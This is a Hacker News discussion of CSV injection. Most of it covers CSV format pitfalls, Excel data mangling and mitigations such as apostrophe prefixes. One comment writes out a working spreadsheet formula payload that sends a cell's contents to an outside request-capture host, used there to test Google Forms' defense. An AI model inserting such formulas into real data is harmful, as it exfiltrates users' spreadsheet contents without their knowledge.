Dangers of CSV Injection

(georgemauer.net)

645 points · rpenm · 8y ago · 188 comments

datenwolf8y ago· 14 in thread

The thing that puzzles me the most is, that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band-signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).
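
A minimal sketch of the ASV idea in Python, assuming (as the comment does) that field values never contain the separator control codes. The names `dump_asv` and `load_asv` are made up for illustration and do not come from any library.

```python
US = "\x1f"  # Unit Separator: placed between fields
RS = "\x1e"  # Record Separator: placed between records


def dump_asv(rows):
    """Serialize rows of strings; reject values that contain a separator."""
    for row in rows:
        for field in row:
            if US in field or RS in field:
                raise ValueError("field contains a separator control code")
    return RS.join(US.join(row) for row in rows)


def load_asv(text):
    """Split text back into rows of fields; no quoting or escaping involved."""
    if text == "":
        return []
    return [record.split(US) for record in text.split(RS)]


# Commas, double quotes and newlines in values need no special treatment.
rows = [["name", "note"], ["Smith, J.", 'said "hi"\nthen left']]
assert load_asv(dump_asv(rows)) == rows
```

The trade-off raised in the replies still applies: the output is unambiguous to parse but hard to view or edit in most text editors.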

burntsushi8y ago

This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.

ddevault8y ago

Let's send patches to text editors so they render fancy ASCII characters? I also find it amusing that "fancy ASCII characters" is even a statement that can make sense; there are only 128 ASCII characters!

paulie_a8y ago

Honestly I dispute that it is "human readable". It is sort of legible but incredibly inconvenient to read or manually write. They might be slightly more convenient than tabular files such as ACH or DDF

davedx8y ago

The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

Sure, if you're building some kind of system where you need to ingest data from one application into another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.

dspillett8y ago

> There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

That, and data in CSV format is human readable in any old text editor or even word processor, which many use as a quick sanity check to make sure their data looks sane. A lot of editors will not display the ASCII control characters at all, so the fields on the line get mashed together, or may even reject the file as containing what it considers to be unexpected characters.

ajdlinux8y ago

Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.

tluyben28y ago

I cannot remember how often, when I worked in 'enterprise software', we were sent CSV files by companies, and they were completely broken after someone 'simply edited' them with a 'standard editor'. More than a 1000x for sure over the years.

Worse; most 'non computer people' cannot get them imported into a spreadsheet properly (for whatever reason; usually it just puts everything in one field or column, people curse and give up), so they have to edit them in Notepad or worse, in MS Word and then send them back.

Not really seeing the beauty I guess.

datenwolf8y ago

How about Vim?

:help digraph

:help digraph-table

Feel free to implement mappings for quickly accessing these digraphs. Those pesky F<n> keys are perfect for this. Easy to reach, gets the job done.

emidln8y ago

Vim and Emacs can. If your editor can't, maybe it should get with the (54 year old) program.

eli8y ago

I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.

If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.

baldfat8y ago

I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans them into a PDF, ugh. I had one vendor that on purpose made the data only available in forms that would take me 600+ lines of code to clean up in mangled ASCII format.

I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?

I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.

mnx8y ago

Actually, XLS is not bad to work with, if you have a library for it. And it's well defined, unlike CSV. As far as I know, there's no way to make a CSV file that will open and show nicely in all popular versions of Excel, Google Docs, and OpenOffice, especially across language settings. And a well-formed XLS file will just work.

sbierwagen8y ago

If a dev is going to use a weirdo non-CSV data interchange format, they would just use XLSX or JSON or etc etc etc.

"ASV" is only a viable option if you then also use your time machine to go back 40 years and make everyone start using it then.

thepompano8y ago

This might create some integration-related hiccups with XML, as most ASCII control characters are forbidden per the XML 1.0/1.1 specs.
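
A quick way to see the XML 1.0 restriction, sketched with Python's standard `xml.etree.ElementTree` parser. The element name `field` is arbitrary; the document simply embeds a raw Unit Separator (0x1F) in element text.

```python
import xml.etree.ElementTree as ET

doc = "<field>a\x1fb</field>"  # raw Unit Separator inside element text

try:
    ET.fromstring(doc)
    parsed = True
except ET.ParseError:
    # The parser refuses the document because 0x1F is not a legal
    # XML 1.0 character.
    parsed = False

print(parsed)
```

So any pipeline that wraps ASV payloads in XML 1.0 would have to encode or strip the separators first.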

pavel_lishin8y ago· 13 in thread

Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, and also get exported as such.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.
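
To make the data loss concrete, here is a small Python sketch. It only mimics the scientific-notation display format with five decimals; it is not Excel's actual export code.

```python
upc = 123456123456

exported = format(upc, ".5E")     # the kind of text that ends up in the CSV
recovered = int(float(exported))  # the best a downstream parser can do

print(exported)          # 1.23456E+11
print(recovered)         # 123456000000
print(recovered == upc)  # False
```

The last six digits are gone, so the original code cannot be reconstructed from the file.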

pc868y ago

I used to work in third-party logistics and a big project of mine was an automated file import process, so folks could send us their daily/hourly orders for processing and fulfillment. I'd say roughly 65-70% of the entire code base was error handling and figuring out when to kick out a file for human review and/or outright deny it and contact the customer.

The hardest ones to work with were the mom and pop shops who suddenly had some success on Amazon and came to us after fulfilling out of their garage for a year and a half. Try telling a semi-retired 60 year old electrician in the middle of Iowa that the file he sent is worthless because none of the product codes match what you have, especially when once he closes the file he doesn't have any idea where it is.

mratzloff8y ago

A long time ago I did the same work with banks. The effect was the same. It was amazing to me how bank employees could somehow find a way to regularly insert ASCII control characters into a CSV value.

pavel_lishin8y ago

These are the exact problems we're banging our heads against.

The worst part is that it's not something that can be solved with an external dependency on some new startup - that would just add another layer we'd have to go through in the error cases, which would be numerous.

God, I wish I could share some of the files we've received. I cannot conceive what sort of monster would write a data exporter that would produce these unreadable things.

geocar8y ago

CSV is the source of so many problems. CSV has no character set, no rule for escaping double-quotation marks, commas, and newlines. There's not even a way to look at a CSV file and tell what its "rules" are beyond heuristics, and those only take you so far.

I ask for XLSX files since at least it's structured, unambiguous and documented, but even better: a minimal XLSX parser is trivial (about a page) to write.

Also: Educating users on how to specify the character set in every application that the user seems to want to use is a special kind of hell.

PaulHoule8y ago

I'd say that the spreadsheet model is long in the tooth, but there has been a failure of will in the industry to kill it.

People use Excel when they should really use a database, they use it because they want to format something on a 2-d grid, edit tabular data, make plots, do calculations, make projections, etc.

The problems go down to the data structures in use.

For instance there is nothing 2-dimensional about financial reports (and projections), really financial reports are hyperdimensional. Proper handling of dates and times is absolutely critical. Also the use of floating point with a binary exponent is a huge distraction in any kind of math tools aimed at ordinary people. (Mainframes got that right in the 1960s!)

Google Sheets is just a stripped down version of Excel and other than the ability for multiple people to work on it simultaneously, is really no better.

dvlsg8y ago

RFC 4180 definitely lays out rules for how to escape double quotes, commas, and newlines.
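
For illustration, Python's standard `csv` module with its default dialect applies those rules for these three cases: a field containing a comma, a double quote, or a line break is wrapped in double quotes, and embedded double quotes are doubled. A short round trip, as a sketch:

```python
import csv
import io

row = ["a,b", 'say "hi"', "line1\nline2"]

# newline="" keeps the writer's own \r\n line terminator untouched.
buf = io.StringIO(newline="")
csv.writer(buf).writerow(row)
text = buf.getvalue()
print(repr(text))

# Reading the text back yields the original three fields.
parsed = next(csv.reader(io.StringIO(text, newline="")))
assert parsed == row
```

Whether the application on the other end follows the same rules is a separate question, which is the complaint in the parent comment.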

daveheq8y ago

I've used several different characters for escaping, though I don't know why backslash (\) isn't the default universal one. It seems pretty sensible, it's used across multiple scripting languages and CLIs. If you need to escape a backslash, you escape it with a backslash.

rattray8y ago

Does xlsx suffer from the same vulnerabilities?

What are the downsides of using it for ~everything?

jhbadger8y ago

Excel is also well known for mangling gene names in expression data. No, SEPT2 (Septin-2) shouldn't be silently "corrected" to 2-Sep, but it is...

aqme288y ago

Zip codes also have a bad habit of getting reformatted, because leading zeroes are removed.

01101 -> 1101

ajanuary8y ago

Export side you obviously can't control :( But on import, if you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)

danhess688y ago

Really quite rich people relying on Excel for economic world-scale critical stuff has ruined/cost more than a few lives. Do you blame Bill for his shitty software or do you blame the rich corporate types for not giving a shit/incompetent minimum effort IT?

danhess688y ago

If you run your bank/brokerage off a fucking spreadsheet then maybe you don't deserve those six bars p.a.

kristofferR8y ago· 13 in thread

CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.

erik_seaberg8y ago

A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).

kristofferR8y ago

I shouldn't have to resort to arcane concepts like importing files to get them to display properly when people in other locales can just open them.

Piskvorrr8y ago

Good luck with configuration if your CSV parser is ten layers removed from any human, and still needs to get it right. Now what? (Now we guess. We call it "heuristics," of course.)
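
One readily available form of such guessing is `csv.Sniffer` in Python's standard library. The sketch below assumes a small semicolon-separated sample and restricts the candidate delimiters to a hypothetical shortlist; on messier real-world input the guess can be wrong or fail outright.

```python
import csv
import io

sample = "name;qty;price\nwidget;2;10\ngadget;5;20\nthing;7;30\n"

# Ask the sniffer to choose among a few plausible delimiters.
dialect = csv.Sniffer().sniff(sample, delimiters=";,\t|")
rows = list(csv.reader(io.StringIO(sample, newline=""), dialect))

print(repr(dialect.delimiter))
print(rows[1])
```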

viraptor8y ago

> CSVs to show properly in Excel we have to mess around with OS language settings.

Why? Aren't the import settings enough?

https://support.office.com/en-us/article/Text-Import-Wizard-...

kristofferR8y ago

That copies the data from the CSV file into a worksheet, you aren't editing the CSV file anymore.

I'm not just being pedantic, it makes a big difference. If I want to change some values in a spreadsheet I should be able to just open it, change the values, save, and be certain that the document will be identical apart from the deliberate changes. This is especially important for CSV files, which are commonly used for import/export operations.

seszett8y ago

> Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons

Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

I don't know about Excel, but LibreOffice makes it very easy to select which parameters to use when opening a CSV file; it works just fine.

PhasmaFelis8y ago

> Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

If you're going to separate values with semicolons--which is perfectly reasonable--I feel like you probably shouldn't do that with a format called Comma Separated Values.

mulmen8y ago

Picking a less-common separator might help, but you could also just follow RFC 4180: quote fields that contain commas, then double any double quotes inside values.

mark-r8y ago

You can also use the file import wizard in Excel to make similar choices. But that's not the default behavior for files with a .csv extension.

pvdebbe8y ago

The only good CSV dialect is the dif-named DSV (Delimiter Separated Values) where you select and support just one supported delimiter, and you require escaping of the delim character inside values. It's simple, it works. Quotes are hard to parse so don't use those. Just \escape.

http://www.catb.org/esr/writings/taoup/html/ch05s02.html
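
A rough sketch of that style in Python, assuming `|` as the single delimiter and one record per line. The function names are hypothetical, and the delimiter must not be a backslash or the letter `n`.

```python
def encode_record(fields, delim="|"):
    """Join fields, backslash-escaping backslashes, delimiters and newlines."""
    out = []
    for field in fields:
        field = field.replace("\\", "\\\\")         # escape the escape first
        field = field.replace(delim, "\\" + delim)  # then the delimiter
        field = field.replace("\n", "\\n")          # keep one record per line
        out.append(field)
    return delim.join(out)


def decode_record(line, delim="|"):
    """Split one line on unescaped delimiters and undo the escapes."""
    fields, current, chars = [], [], iter(line)
    for ch in chars:
        if ch == "\\":
            nxt = next(chars, "")
            current.append("\n" if nxt == "n" else nxt)
        elif ch == delim:
            fields.append("".join(current))
            current = []
        else:
            current.append(ch)
    fields.append("".join(current))
    return fields


fields = ["a|b", "c\\d", "x\ny", ""]
assert decode_record(encode_record(fields)) == fields
```

Because there is no quoting state, a parser can split on the delimiter in a single left-to-right pass.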

Raticide8y ago

What's a good alternative non-proprietary format that all major spreadsheet software supports?

kristofferR8y ago

Unicode is vast. There's absolutely no good reason we don't have Snowman Separated Values (or some other proper separator sign that isn't commonly used elsewhere) other than that people don't demand it.

Piskvorrr8y ago

While XLSX is proprietary by descent, it is standardized; thus, it's readable/writable by man and machine alike (essentially a zipped XML with some bells and whistles). I have not encountered a less broken format that is similarly widespread.

Dylan168078y ago· 12 in thread

> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.
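
The prefixing workaround discussed here can be sketched on the producer side as follows. The trigger characters are the ones quoted from the article; the function name `neutralize_cell` is made up, and the prefix is left configurable so either the tab or the `'` variant can be tried. This is a mitigation sketch, not a complete defense, and it also alters legitimate values such as negative numbers.

```python
FORMULA_TRIGGERS = ("=", "-", "+", "@")


def neutralize_cell(value, prefix="\t"):
    """Prefix cells that a spreadsheet might otherwise evaluate as a formula."""
    if value.startswith(FORMULA_TRIGGERS):
        return prefix + value
    return value


row = ["1", "foo", "=SUM(A1:A10)", "bar"]
print([neutralize_cell(cell) for cell in row])
```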

autra8y ago

> The documented way is prefixing with a ' character. It doesn't have the length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.

:-/

smhenderson8y ago

That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will happily eat leading zeros. There is a specific number format to correct that. If you export that file to CSV with the format set the CSV file will have 5 digits. If you reopen that CSV file in Excel it gobbles up the zeros all over again.

As someone mentioned elsewhere this is an issue with long numbers. Excel converts them to scientific notation. Reformat and export, all good. Reopen said file, back to scientific notation.

Really anything that relies on an escape character (') or a specific format gets lost on export to CSV. It exports correctly but there is simply no way to document these formats in a CSV file and have it be compatible with anything but Excel.

noobermin8y ago

Sounds to me like the elephant in the room is using Excel in the first place, despite how entrenched it is.

Dylan168078y ago

So data entered safely into Excel, exported from Excel, and imported back into Excel... can inject code.

Amazing.

rattray8y ago

Does that occur with the tab character?

ballenf8y ago

Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.

Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.

In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.

cturner8y ago

"transfer a series of values between applications that apply different types to those values and applications that don't"

If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.

Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.

At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or a persistence format. Another case that happens regularly: (1) developer builds a database as a storage mechanism. (2) developer decides to have other separate codebases query into that database. Is the database an application data structure (internal) or an API (external)? It is acting as both.

mulmen8y ago

The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.

fulafel8y ago

I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.

mulmen8y ago

The problem isn't with CSV, it is with spreadsheet applications.

jdelStrother8y ago

That's just a single regular apostrophe? At least on my machine, with Mac Excel 15.38, if I have a CSV containing:

1,foo,'=SUM(A1:A10),bar

and open it, then the single apostrophe is visible in the cell.

elliottcarlson8y ago

You should actually append it to the trigger; i.e.

1,foo,='SUM(A1:A10),bar

fulafel8y ago· 6 in thread

This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?

sanotehu8y ago

Yes, through the "Import" feature. Excel will in that case allow you to choose what "type" each column in the CSV has (and will not parse text if given the "text" type). The problem is that a lot of users (myself included) will use muscle memory and double-click a CSV file in windows explorer rather than opening up Excel and initiating an import.

yjftsjthsd-h8y ago

So why does it not import when opening files?

pbhjpbhj8y ago

So a safe-import could import all columns as text (without interpretation) and offer to parse columns with a predictive input type suggestion.
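
As a sketch of what that could look like: read every cell as plain text, then only suggest a type per column and leave the decision to the user. The function names and the three type labels are assumptions for illustration; values with leading zeros (zip codes, UPCs) are deliberately kept as text.

```python
import csv
import io
import re


def suggest_type(values):
    """Suggest 'integer', 'decimal' or 'text' for a column of strings."""
    non_empty = [v for v in values if v != ""]
    if not non_empty:
        return "text"
    # Leading zeros mean the digits are an identifier, not a quantity.
    if any(re.fullmatch(r"0[0-9]+", v) for v in non_empty):
        return "text"
    if all(re.fullmatch(r"-?[0-9]+", v) for v in non_empty):
        return "integer"
    if all(re.fullmatch(r"-?[0-9]+(\.[0-9]+)?", v) for v in non_empty):
        return "decimal"
    return "text"


def safe_import(text):
    """Read every cell as text; return (header, rows, suggested types)."""
    rows = list(csv.reader(io.StringIO(text, newline="")))
    header, body = rows[0], rows[1:]
    columns = list(zip(*body))
    suggestions = {name: suggest_type(col) for name, col in zip(header, columns)}
    return header, body, suggestions


data = "zip,qty,price,note\n01101,3,9.50,=SUM(A1:A10)\n90210,12,4,plain\n"
header, body, suggestions = safe_import(data)
print(suggestions)
print(body[0])  # the formula-looking cell is still just a string
```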

cm21878y ago

Agree it is completely absurd to allow formulas in a CSV file, let alone code.

I have never seen a way to disable a full recalculation when Excel opens a CSV file, which beyond the security implications is painful for people like me who keep their calculations on manual because I often have very heavy workbooks opened all the time.

matt_kantor8y ago

My first thought was this dead-simple solution: just pop up a prompt when opening CSVs. "Do you want to run formulas from this CSV file?" No need for complicated import wizards, just a simple yes/no.

pbhjpbhj8y ago

"Yes/no/always/always for all files (see settings>blah>foo to change this option" would seem more user friendly to me, or is that too many options?

bitexploder8y ago· 5 in thread

I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column names... schema injection, like SQLi only more hilarious)

Point is apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.

e1g8y ago

We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.

f00_8y ago

>defend against DDoS but not sanitizing user input

>calling a pentester a script kiddie

welp, my work is done here

captn3m08y ago

Were you generating CSVs or importing them?

IncRnd8y ago

"Input is evil" is a pretty good maxim to follow.

marcosdumay8y ago

Yet, nobody ever expects the CSV to be.

TAForObvReasons8y ago· 5 in thread

CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy ?). The "standard" RFC4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.

pmoriarty8y ago

There's nothing in CSV that has anything to do with presentation (nor with what the underlying values are, for that matter).

These vulnerabilities can't be blamed on CSV so much as on the desire of application vendors to treat data as code.

Dylan168078y ago

CSV is a format for two-dimensional text values, and nothing beyond that. It's not a poor format, it's a simple low-level format.

mulmen8y ago

Except if your raw value begins with a "'". Or if it is 2017/10/10, or 10/10/2017, then it may be represented by an integer with a format of "date". Or if your raw value is 1234567890123456789, then you get a string like '1.23456789012345e18', complete with modified data. Or if it begins with an "=" which could result in basically anything as the article points out.

Excel conflates the idea of display format and data type which is the source of countless headaches. It is legacy pain in the purest form.

mjevans8y ago

CSV was only ever intended to store simple text and simple numbers.

Dates are a /type/ of text; parsing dates in to machine readable formats is an /entire/ other can of spam.

cozzyd8y ago

It would be interesting if spreadsheets supported a sub-set of a binary interchange format like FITS or HDF5.

splike8y ago· 4 in thread

Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13...

sixbrx8y ago

I noticed this in the data of some scientists I work with. Another awful thing is that when you tell them they need to format the column as text to prevent this in the future, before the data is put in the column (very important!), they'll eventually try to apply it to their existing fubar spreadsheets as well - in which case the "date-recognized" genes become ... large numbers representing the number of days since 1900, totally unrecognizable.

krylon8y ago

FWIW, I (not a biologist, though) only use LibreOffice for importing CSV these days. It allows me to look at the fields first and tell it if I want to suppress special treatment of data in a column.

EDIT: LibreOffice also allows you to tell it what encoding a file uses and what character(s) are used as separators.

xelxebar8y ago

Just curious, but what about non-vertebrates? I'd have expected there to be an official number/hash that identifies genes like the InChI Key for chemistry or something. IIRC, that key in particular is just a SHA-256 of a long human-readable "chemical formula".

splike8y ago

We'll cross that bridge when we come to it I guess, but we work almost exclusively with human and mouse genomes for now.

In any case, I imagine the Ensembl ID is still safer than other encodings in the case of invertebrates. For example, genes IDs in the Fruit fly genome look like FBgn0034730.

jkabrg8y ago· 4 in thread

Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things: * Human readable. * Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.

kqr8y ago

See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.

The thing you use CSV for is not its technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

johnwilkesbooth8y ago

> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, whereas categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.

f00_8y ago

.parquet fam, it's all about columnar data stores now

tomc19858y ago

XKCD covered this: https://xkcd.com/927/

top_post8y ago· 2 in thread

Sorry to balk, but I'm more outraged at the title, another injection I need to talk about that isn't really the case. The root cause is the interpreter executing untrusted input, the same can be said about macros or any other file type. The perception being most people open CSV files on a regular basis and perceive them to be safe or not interpreted when it appears they are.

bitexploder8y ago

Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.

This one is: your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse... It is a long, complex story that we can sweep up into that generalization. But it is important to know the high, medium, and low levels of these issues. They form a gigantic tree. The medium level somewhere in between is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not its various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can generically understand a side channel easily. But it takes a ton of specific, hard-earned knowledge to avoid one.

top_post8y ago

It kind of is more useful to abstract them, so we're not whack-a-moling the current hype or hot title of the day and can focus on the fundamental issues.

I agree, it catches people off guard to think CSV files once interpreted can do more than give columns of information, but it's not an injection which is my beef.

ComodoHacker8y ago· 2 in thread

My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?

randkyp8y ago

As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've only been able to open CSVs by manually importing them with Excel's 'import data from text file' function.

tyingq8y ago

It does depend on using the csv file extension. Anything else brings up the import wizard.

hutch1208y ago· 2 in thread

Little Bobby Tables reminds us to sanitize our database inputs.

https://imgs.xkcd.com/comics/exploits_of_a_mom.png

billpg8y ago

That's bad advice.

http://blog.hackensplat.com/2013/09/never-sanitize-your-inpu...

trishmapow28y ago

Expected something revolutionary, turned out to be an argument over semantics...

Swizec8y ago· 1 in thread

This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

_betty_8y ago

This used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained HTML and display the HTML instead; it could then pull in a secret Silverlight file that was masquerading as a docx file, as they are both simply zip files. Even more amusingly, Silverlight and docx contents don't clash, so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering HTML with a hidden Silverlight app.

beached_whale8y ago· 1 in thread

Excel protects for this, at least mine does v2013

Piskvorrr8y ago

As mentioned, protects by showing a wall of text with "yes" preselected at bottom; equally useless and annoying.

Cyranix8y ago

This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.

https://bugcrowd.com/socrata

(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)

Mortiffer8y ago

In case anyone else was wondering about Google Forms: I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field, and Google automatically prepends a "'" such that '=IMPORTXML does not execute.
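
For anyone generating CSVs themselves, the same apostrophe trick can be sketched in a few lines of Python. This is only an illustration: the helper names `neutralize` and `write_rows` are made up, and the set of trigger characters is an assumption rather than an exhaustive list. It also shares the known weaknesses of the approach: legitimate values such as "-5" get prefixed too, and the apostrophe may not survive a save-and-reopen round trip in a spreadsheet.

```python
import csv
import io

# Characters that spreadsheet applications commonly treat as the start of a
# formula. This set is an assumption for illustration, not an exhaustive list.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize(cell: str) -> str:
    """Prefix formula-looking cells with an apostrophe so they load as text."""
    if cell.startswith(FORMULA_TRIGGERS):
        return "'" + cell
    return cell


def write_rows(rows) -> str:
    """Serialize rows to CSV text, neutralizing every cell first."""
    buf = io.StringIO()
    writer = csv.writer(buf)  # handles quoting of commas and double quotes
    for row in rows:
        writer.writerow([neutralize(str(cell)) for cell in row])
    return buf.getvalue()


output = write_rows([
    ["name", "comment"],
    ["bob", '=IMPORTXML("https://example.invalid","//a")'],
])
print(output)
```

Whether this belongs in the exporter at all is exactly what the rest of the thread argues about; the sketch only shows what the workaround looks like on the producing side.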

jaclaz8y ago

At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.

A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".
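
Outside Excel, the "explicit separator, every column as text" idea looks roughly like this in Python. It is a minimal sketch, assuming a semicolon-delimited file; the function name `read_as_text` and the sample data are invented for the example. The standard `csv` module never interprets field contents, so leading zeroes, decimal commas and formula-like strings come through unchanged.

```python
import csv
import io


def read_as_text(data: str, delimiter: str = ";"):
    """Parse delimited text and return every field as a plain string."""
    reader = csv.reader(io.StringIO(data), delimiter=delimiter)
    return [row for row in reader]


# Hypothetical sample: a zip code with a leading zero, a decimal comma,
# and a cell that a spreadsheet would treat as a formula.
sample = "zip;price;note\n01101;3,50;=SUM(A1:A10)\n"
rows = read_as_text(sample)

for row in rows:
    print(row)
```

Any type conversion then becomes an explicit, per-column decision by the consumer instead of a guess made at open time.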

captn3m08y ago

On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

>CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/cs...

